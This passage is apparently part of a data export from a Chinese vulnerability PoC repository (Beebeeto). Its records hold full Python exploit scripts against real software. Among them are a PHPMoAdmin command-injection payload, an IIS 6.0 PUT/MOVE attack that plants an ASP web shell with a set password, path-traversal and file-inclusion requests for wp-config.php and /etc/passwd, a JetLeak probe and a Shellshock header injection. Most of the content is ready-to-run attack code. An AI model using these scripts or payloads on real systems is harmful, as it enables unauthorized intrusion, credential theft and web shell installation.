\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (0-Day) POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-03-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPMoAdmin',\r\n 'vul_version': ['*'],\r\n 'type': 'Command Execution',\r\n 'tag': ['PHPMoAdmin\u6f0f\u6d1e', 'PHPMoAdmin\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c', '/moadmin.php', 'php'],\r\n 'desc': 'PHPMoAdmin is a MongoDB administration tool for PHP built on a\\\r\n stripped-down version of the Vork high-performance framework.',\r\n 'references': ['http://seclists.org/fulldisclosure/2015/Mar/19',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_path = ['/moadmin.php', '/moadmin/moadmin.php', '/wu-moadmin/wu-moadmin.php']\r\n for f in file_path:\r\n verify_url = args['options']['target'] + f\r\n command = {'object': '''1;system('echo -n \"beebeeto\"|md5sum;');exit''',}\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.post(verify_url, data=command).content\r\n if '595bb9ce8726b4b55f538d3ca0ddfd76' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['post_content'] = \"object=1;system('command');exit\"\r\n return args\r\n continue\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PHPMoAdmin is a MongoDB administration tool for PHP built on a\r\nstripped-down version of the Vork high-performance framework.", "app_name": "PHPMoAdmin", "id": "poc-2015-0044", "layer4_protocol": null}
{"create_date": "2015-03-03 10:51:31", "name": "IIS 6.0 PUT \u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u521b\u5efa", "tag": "IIS PUT \u6f0f\u6d1e,IIS,IIS\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20,IIS\u8001\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\nimport httplib\r\nimport sys\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0043',\r\n 'name': 'IIS 6.0 PUT \u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-03-03',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'IIS',\r\n 'vul_version': ['6.0'],\r\n 'type': 'Arbitrary File Creation',\r\n 'tag': ['IIS PUT \u6f0f\u6d1e', 'IIS', 'IIS\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20', 'IIS\u8001\u6f0f\u6d1e'],\r\n 'desc': \"IIS\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e\u3002\",\r\n 'references': ['http://www.lijiejie.com/python-iis-put-file/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n if verify_url.startswith(('http://', 'https://')):\r\n verify_url = urlparse.urlparse(verify_url).netloc\r\n if args['options']['verbose']:\r\n print '[*] Detection server type...'\r\n conn = httplib.HTTPConnection(verify_url)\r\n conn.request(method='OPTIONS', url='/')\r\n headers = dict(conn.getresponse().getheaders())\r\n if args['options']['verbose']:\r\n if headers.get('server', '').find('Microsoft-IIS') < 0:\r\n print '[-] This is not an IIS web server'\r\n if 'public' in headers and \\\r\n headers['public'].find('PUT') > 0 and \\\r\n headers['public'].find('MOVE') > 0:\r\n conn.close()\r\n conn = httplib.HTTPConnection(verify_url)\r\n # PUT hack.txt\r\n conn.request( method='PUT', url='/hack.txt', body='<%execute(request(\"bb2\"))%>' )\r\n conn.close()\r\n conn = httplib.HTTPConnection(verify_url)\r\n # mv hack.txt to hack.asp\r\n conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['webshell'] = '%s/hack.txt' % verify_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n args['poc_ret']['false'] = '[-] Server not vulnerable'\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "IIS\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e\u3002", "app_name": "IIS", "id": "poc-2015-0043", "layer4_protocol": null}
{"create_date": "2015-03-02 15:12:41", "name": "Wordpress CodeArt Google MP3 Player Plugin <=1.0.11 /direct_download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress CodeArt Google MP3 Player\u63d2\u4ef6\u6f0f\u6d1e,/direct_download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2015-0041',\r\n 'name': 'Wordpress CodeArt Google MP3 Player Plugin <=1.0.11 /direct_download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'Tiny',\r\n 'create_date': '2015-03-01',\r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['<=1.0.11',], \r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Wordpress CodeArt Google MP3 Player\u63d2\u4ef6\u6f0f\u6d1e', '/direct_download.php','php'],\r\n 'desc': '''\r\n Wordpress CodeArt Google MP3 Player Plugin has file download in\r\n do/direct_download.php.\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/35460/', \r\n ], \r\n }, \r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 'file=../../../wp-config.php'\r\n path = '/wp-content/plugins/google-mp3-audio-player/direct_download.php?'\r\n verify_url = args['options']['target'] + path + payload\r\n request = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n response = urllib2.urlopen(request)\r\n reg = re.compile(\"DB_PASSWORD\")\r\n if reg.findall(response.read()):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n \r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Wordpress CodeArt Google MP3 Player Plugin has file download in do/direct_download.php.", "app_name": "WordPress", "id": "poc-2015-0041", "layer4_protocol": null}
{"create_date": "2015-03-02 15:07:11", "name": "WordPress UnGallery plugin <= 1.5.8 /source_vuln.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "WordPress UnGallery plugin\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b,source_vuln.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0040',\r\n 'name': 'WordPress UnGallery plugin <= 1.5.8 /source_vuln.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'Tiny',\r\n 'create_date': '2015-03-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['<=1.5.8'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['WordPress UnGallery plugin\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b', 'source_vuln.php', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/wp-content/plugins/ungallery/source_vuln.php',\r\n 'references': ['http://www.exploit-db.com/exploits/17704/',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../etc/passwd%00'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:x:0:0:root:/root:/bin/bash' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/wp-content/plugins/ungallery/source_vuln.php", "app_name": "WordPress", "id": "poc-2015-0040", "layer4_protocol": null}
{"create_date": "2015-02-26 14:04:17", "name": "Jetty Web Server 9.2.x-9.3.x \u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e [CVE-2015-2080] POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Jetty Web Server\u6f0f\u6d1e,CVE-2015-2080,\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport ssl\r\nimport sys\r\nimport urllib\r\nimport httplib\r\nimport urllib2\r\nimport string\r\nimport getopt\r\n\r\nfrom urlparse import urlparse\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0037',\r\n 'name': 'Jetty Web Server 9.2.x-9.3.x \u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e [CVE-2015-2080] POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-02-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Jetty Web Server',\r\n 'vul_version': ['9.2.8'],\r\n 'type': 'Other',\r\n 'tag': ['Jetty Web Server\u6f0f\u6d1e', 'CVE-2015-2080', '\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': '''\r\n GDS\u5b89\u5168\u516c\u53f8\u53d1\u73b0\u4e86\u4e00\u4e2aJetty web server\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e\uff0c\r\n \u901a\u8fc7\u8be5\u6f0f\u6d1e\u4e00\u4e2a\u6ca1\u6709\u8ba4\u8bc1\u8fc7\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u524d\u5408\u6cd5\u7528\u6237\u5411\u670d\u52a1\u5668\u53d1\u9001\u7684\u8bf7\u6c42\u3002\r\n \u7b80\u800c\u8a00\u4e4b\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ece\u5b58\u5728\u6f0f\u6d1e\u7684\u670d\u52a1\u5668\u8fdc\u7a0b\u83b7\u53d6\u7f13\u5b58\u533a\u7684\u654f\u611f\u4fe1\u606f\uff0c\r\n \u5305\u62echttp\u5934\u7684\u4fe1\u606f\uff08cookies\u3001\u8ba4\u8bc1\u7684tokens\u3001\u9632\u6b62CSRF\u7684tokens\u7b49\u7b49\uff09\u4ee5\u53ca\u7528\u6237POST\u7684\u6570\u636e\uff08\u7528\u6237\u540d\u3001\u5bc6\u7801\u7b49\uff09\u3002\r\n\r\n \u6f0f\u6d1e\u7684\u6839\u6e90\u5728\u4e8e\u5f53header\u4e2d\u88ab\u63d2\u5165\u6076\u610f\u7684\u5b57\u7b26\u5e76\u63d0\u4ea4\u5230\u670d\u52a1\u5668\u540e\uff0c\u4f1a\u4ece\u5f02\u5e38\u5904\u7406\u4ee3\u7801\u4e2d\u83b7\u5f97\u5171\u4eab\u7f13\u51b2\u533a\u5927\u7ea616\r\n bytes\u7684\u6570\u636e\u3002\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u4e00\u4e2a\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u6765\u83b7\u53d6\u5f02\u5e38\u5e76\u504f\u79fb\u5230\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\uff0c\r\n \u5171\u4eab\u7f13\u51b2\u533a\u4e2d\u5b58\u7684\u662f\u7528\u6237\u5148\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0cJetty\u670d\u52a1\u5668\u4f1a\u6839\u636e\u7528\u6237\u63d0\u4ea4\u7684\u8bf7\u6c42\u8fd4\u56de\u5927\u7ea616\r\n bytes\u7684\u6570\u636e\u5757\uff0c\u8fd9\u91cc\u9762\u4f1a\u5305\u542b\u654f\u611f\u4fe1\u606f\u3002\r\n ''',\r\n 'references': [\r\n 'http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html',\r\n 'https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py'\r\n 'http://bobao.360.cn/news/detail/1251.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type='string', default='80',\r\n help='Use port. Default: 80')\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n '''\r\n Github Author: Gotham Digital Science\r\n Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether\r\n their Jetty web server versions are vulnerable to JetLeak. Currently, this script does\r\n not handle sites with invalid SSL certs. This will be fixed in a future iteration.\r\n '''\r\n\r\n conn = None\r\n verify_url = urlparse(args['options']['target'])\r\n port = args['options']['port']\r\n fake_headers = ForgeHeaders().get_headers()\r\n\r\n if verify_url.scheme == \"https\":\r\n conn = httplib.HTTPSConnection(verify_url.netloc + \":\" + port)\r\n elif verify_url.scheme == \"http\":\r\n conn = httplib.HTTPConnection(verify_url.netloc + \":\" + port)\r\n else:\r\n args['poc_ret']['Error'] = \"Error: Only 'http' or 'https' URL Schemes Supported\"\r\n return args\r\n\r\n if args['options']['verbose']:\r\n print '[*] Connect: %s ...' % verify_url.netloc\r\n\r\n try:\r\n x = '\\x00'\r\n fake_headers['Referer'] = x\r\n conn.request('POST', '/', '', fake_headers)\r\n r1 = conn.getresponse()\r\n except:\r\n return args\r\n\r\n if (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = '%s:%s' % (verify_url, port)\r\n args['poc_ret']['headers'] = fake_headers\r\n return args\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "GDS\u5b89\u5168\u516c\u53f8\u53d1\u73b0\u4e86\u4e00\u4e2aJetty web server\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e\uff0c\r\n\u901a\u8fc7\u8be5\u6f0f\u6d1e\u4e00\u4e2a\u6ca1\u6709\u8ba4\u8bc1\u8fc7\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u524d\u5408\u6cd5\u7528\u6237\u5411\u670d\u52a1\u5668\u53d1\u9001\u7684\u8bf7\u6c42\u3002\r\n\u7b80\u800c\u8a00\u4e4b\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ece\u5b58\u5728\u6f0f\u6d1e\u7684\u670d\u52a1\u5668\u8fdc\u7a0b\u83b7\u53d6\u7f13\u5b58\u533a\u7684\u654f\u611f\u4fe1\u606f\uff0c\r\n\u5305\u62echttp\u5934\u7684\u4fe1\u606f\uff08cookies\u3001\u8ba4\u8bc1\u7684tokens\u3001\u9632\u6b62CSRF\u7684tokens\u7b49\u7b49\uff09\u4ee5\u53ca\u7528\u6237POST\u7684\u6570\u636e\uff08\u7528\u6237\u540d\u3001\u5bc6\u7801\u7b49\uff09\u3002\r\n\r\n\u6f0f\u6d1e\u7684\u6839\u6e90\u5728\u4e8e\u5f53header\u4e2d\u88ab\u63d2\u5165\u6076\u610f\u7684\u5b57\u7b26\u5e76\u63d0\u4ea4\u5230\u670d\u52a1\u5668\u540e\uff0c\u4f1a\u4ece\u5f02\u5e38\u5904\u7406\u4ee3\u7801\u4e2d\u83b7\u5f97\u5171\u4eab\u7f13\u51b2\u533a\u5927\u7ea616\r\nbytes\u7684\u6570\u636e\u3002\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u4e00\u4e2a\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u6765\u83b7\u53d6\u5f02\u5e38\u5e76\u504f\u79fb\u5230\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\uff0c\r\n\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\u5b58\u7684\u662f\u7528\u6237\u5148\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0cJetty\u670d\u52a1\u5668\u4f1a\u6839\u636e\u7528\u6237\u63d0\u4ea4\u7684\u8bf7\u6c42\u8fd4\u56de\u5927\u7ea616\r\nbytes\u7684\u6570\u636e\u5757\uff0c\u8fd9\u91cc\u9762\u4f1a\u5305\u542b\u654f\u611f\u4fe1\u606f\u3002", "app_name": "Jetty Web Server", "id": "poc-2015-0037", "layer4_protocol": null}
{"create_date": "2015-02-19 10:38:44", "name": "StaMPi /path/fotogalerie.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "StaMPi\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b,/path/fotogalerie.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0035',\r\n 'name': 'StaMPi /path/fotogalerie.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'Tiny',\r\n 'create_date': '2015-02-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StaMPi',\r\n 'vul_version': ['*'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['StaMPi\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b', '/path/fotogalerie.php', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/path/fotogalerie.php',\r\n 'references': ['http://www.exploit-db.com/exploits/36031/',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:x:0:0:root:/root:/bin/bash' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/path/fotogalerie.php", "app_name": "Other", "id": "poc-2015-0035", "layer4_protocol": null}
{"create_date": "2015-02-15 17:20:25", "name": "GNU Bash <= 4.3 Shockshell \u7834\u58f3\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "Tommy", "rank": 3, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "bash\u6f0f\u6d1e,CVE-2014-6271,ShellShock\u7834\u58f3\u6f0f\u6d1e,cgi", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0032',\r\n 'name': 'GNU Bash <= 4.3 Shockshell \u7834\u58f3\u6f0f\u6d1e POC',\r\n 'author': 'Tommy',\r\n 'create_date': '2015-02-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'bash',\r\n 'vul_version': ['<=4.3'],\r\n 'type': 'Command Execution',\r\n 'tag': ['bash\u6f0f\u6d1e', 'CVE-2014-6271', 'ShellShock\u7834\u58f3\u6f0f\u6d1e', 'cgi'],\r\n 'desc': '\u6267\u884cshell\u547d\u4ee4\uff0c\u4ece\u800c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u6f0f\u3001\u672a\u6388\u6743\u7684\u6076\u610f\u4fee\u6539\u3001\u670d\u52a1\u4e2d\u65ad',\r\n 'references': [\r\n 'http://www.exploit-db.com/exploits/34765/',\r\n 'http://blog.knownsec.com/2014/09/shellshock_response_profile/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n '''\r\n GNU Bash 4.3\u53ca\u4e4b\u524d\u7248\u672c\u5728\u8bc4\u4f30\u67d0\u4e9b\u6784\u9020\u7684\u73af\u5883\u53d8\u91cf\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\r\n \u5411\u73af\u5883\u53d8\u91cf\u503c\u5185\u7684\u51fd\u6570\u5b9a\u4e49\u540e\u6dfb\u52a0\u591a\u4f59\u7684\u5b57\u7b26\u4e32\u4f1a\u89e6\u53d1\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6539\u53d8\u6216\u7ed5\u8fc7\u73af\u5883\u9650\u5236\uff0c\r\n \u4ee5\u6267\u884cShell\u547d\u4ee4\u3002\u67d0\u4e9b\u670d\u52a1\u548c\u5e94\u7528\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u63d0\u4f9b\u73af\u5883\u53d8\u91cf\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002\r\n \u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728\u8c03\u7528Bash Shell\u4e4b\u524d\u53ef\u4ee5\u7528\u6784\u9020\u7684\u503c\u521b\u5efa\u73af\u5883\u53d8\u91cf\u3002\r\n \u8fd9\u4e9b\u53d8\u91cf\u53ef\u4ee5\u5305\u542b\u4ee3\u7801\uff0c\u5728Shell\u88ab\u8c03\u7528\u540e\u4f1a\u88ab\u7acb\u5373\u6267\u884c\u3002\r\n '''\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n\tip = args['options']['target']\r\n\topener = urllib2.build_opener()\r\n\t# Modify User-agent header value for Shell Shock test\r\n\topener.addheaders = [\r\n ('User-agent', '() { :;}; echo Content-Type: text/plain ; echo \"1a8b8e54b53f63a8efae84e064373f19:\"'),\r\n\t\t\t\t('Accept','text/plain'),\r\n\t\t\t\t('Content-type','application/x-www-form-urlencoded'),\r\n\t\t\t\t('Referer','http://www.baidu.com')\r\n\t\t\t\t]\r\n\ttry:\r\n\t\tURL = ip\r\n\t\tresponse = opener.open(URL)\r\n\t\theaders = response.info()\r\n\t\tstatus = response.getcode()\r\n\t\topener.close()\r\n\t\tif status==200:\r\n\t\t\tif \"1a8b8e54b53f63a8efae84e064373f19\" in headers:\r\n\t\t\t\targs['success'] = True\r\n\t\t\t\targs['poc_ret']['vul_url'] = URL\r\n\t\t\telse:\r\n\t\t\t\targs['success'] = False\r\n\t\treturn args\r\n\t\t\r\n\texcept Exception as e:\r\n\t\topener.close()\r\n\t\targs['success'] = False\r\n\t\treturn args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6267\u884cshell\u547d\u4ee4\uff0c\u4ece\u800c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u6f0f\u3001\u672a\u6388\u6743\u7684\u6076\u610f\u4fee\u6539\u3001\u670d\u52a1\u4e2d\u65ad", "app_name": "bash", "id": "poc-2015-0032", "layer4_protocol": null}
{"create_date": "2015-02-09 22:57:18", "name": "FCKeditor <= 2.4.3 /upload.asp File Upload POC & Exploit", "level": "\u4e2d\u5371", "batchable": 0, "author": "r0gent", "rank": 3, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "FCKeditor\u6f0f\u6d1e,FCK\u7f16\u8f91\u5668\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e,asp,php,aspx", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding:utf-8\r\n\r\n\r\nimport re\r\nimport socket\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc' : {\r\n 'id' : 'poc-2015-0031',\r\n 'name' : 'FCKeditor <= 2.4.3 /upload.asp File Upload POC & Exploit',\r\n 'author' : 'r0gent',\r\n 'create_date' : '2015-02-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol' : {\r\n 'name' : 'http',\r\n 'port' : [80],\r\n 'layer4_protocol' : 